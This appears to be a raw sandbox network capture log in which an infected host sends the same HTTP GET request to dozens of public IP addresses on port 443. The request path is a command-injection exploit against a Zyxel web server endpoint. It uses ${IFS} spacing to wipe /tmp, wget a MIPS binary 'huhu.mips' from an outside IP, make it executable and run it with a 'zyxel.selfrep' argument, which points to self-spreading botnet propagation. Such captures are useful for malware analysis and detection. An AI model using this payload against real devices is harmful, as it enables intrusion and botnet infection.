                                            Feb 2, 2024 06:21:01.409352064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1366192.168.2.155508074.17.45.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.409385920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1367192.168.2.1560854113.38.127.203443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.409419060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1368192.168.2.1553332191.196.97.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.409460068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1369192.168.2.1554530181.16.188.222443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.409497976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1370192.168.2.1545670145.144.63.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.409548998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1371192.168.2.155551284.210.86.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.409590960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1372192.168.2.1558764120.129.209.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.409619093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1373192.168.2.154164642.123.25.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.409646988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1374192.168.2.1548364205.155.180.105443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.409686089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1375192.168.2.155150842.39.44.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.409720898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1376192.168.2.1540714150.48.169.158443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.409756899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1377192.168.2.1559842195.188.133.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.409787893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1378192.168.2.1548496111.250.38.146443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.409825087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1379192.168.2.156099442.250.230.81443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.409849882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1380192.168.2.1546662174.80.168.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.409889936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1381192.168.2.1549538171.80.96.156443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.409926891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1382192.168.2.1535656156.167.1.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.409954071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1383192.168.2.154952070.231.76.129443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.410013914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1384192.168.2.1535364190.0.123.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.410049915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1385192.168.2.153281671.202.89.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.410082102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1386192.168.2.153616066.7.208.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.410129070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1387192.168.2.1554280217.137.39.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.410159111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1388192.168.2.154200296.232.201.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.410197020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1389192.168.2.1560010164.151.101.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.410226107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1390192.168.2.155903696.234.28.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.410274029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1391192.168.2.1544450111.60.95.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.410305977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1392192.168.2.1536930126.151.54.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.410327911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1393192.168.2.1557920216.114.94.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.410366058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1394192.168.2.155290647.215.122.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.410418034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1395192.168.2.1541730131.12.164.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.410433054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1396192.168.2.153708014.209.255.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.410495996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1397192.168.2.1558558217.154.107.69443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.410537958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1398192.168.2.1548860129.56.58.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.410562992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1399192.168.2.1544016159.215.92.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.410594940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1400192.168.2.1537012185.163.197.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.410645962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1401192.168.2.153720277.170.165.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.410681963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1402192.168.2.155989699.189.117.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.410703897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1403192.168.2.1549022162.123.110.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.410739899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1404192.168.2.15569625.174.215.225443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.410780907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1405192.168.2.155473884.204.129.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.410804987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1406192.168.2.154310043.41.60.222443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.410840034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1407192.168.2.1538860182.234.230.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.410882950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1408192.168.2.155718835.23.99.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.410922050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1409192.168.2.153916087.80.114.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.410942078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1410192.168.2.1545608164.174.111.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.410984039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1411192.168.2.155475264.206.63.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.411036015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1412192.168.2.1533328117.149.236.155443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.411067009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1413192.168.2.1545020160.44.204.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.411118984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1414192.168.2.154687494.151.202.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.411128044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1415192.168.2.1550962196.46.177.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.411168098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1416192.168.2.154225864.184.214.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.411196947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1417192.168.2.154364867.251.53.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.411233902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1418192.168.2.1533546193.233.245.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.411282063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1419192.168.2.1539618116.202.182.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.411330938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1420192.168.2.1551082150.0.225.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.411372900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1421192.168.2.1542064134.221.78.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.411395073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1422192.168.2.154200445.117.120.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.411411047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1423192.168.2.1549382200.155.50.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.411467075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1424192.168.2.155380251.253.65.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.411524057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1425192.168.2.156073244.173.201.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.411561966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1426192.168.2.153712836.197.230.129443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.411607027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1427192.168.2.1547022196.117.224.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.411638975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1428192.168.2.1535182167.10.82.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.411664963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1429192.168.2.15568504.9.224.76443
                                            TimestampBytes transferredDirectionData
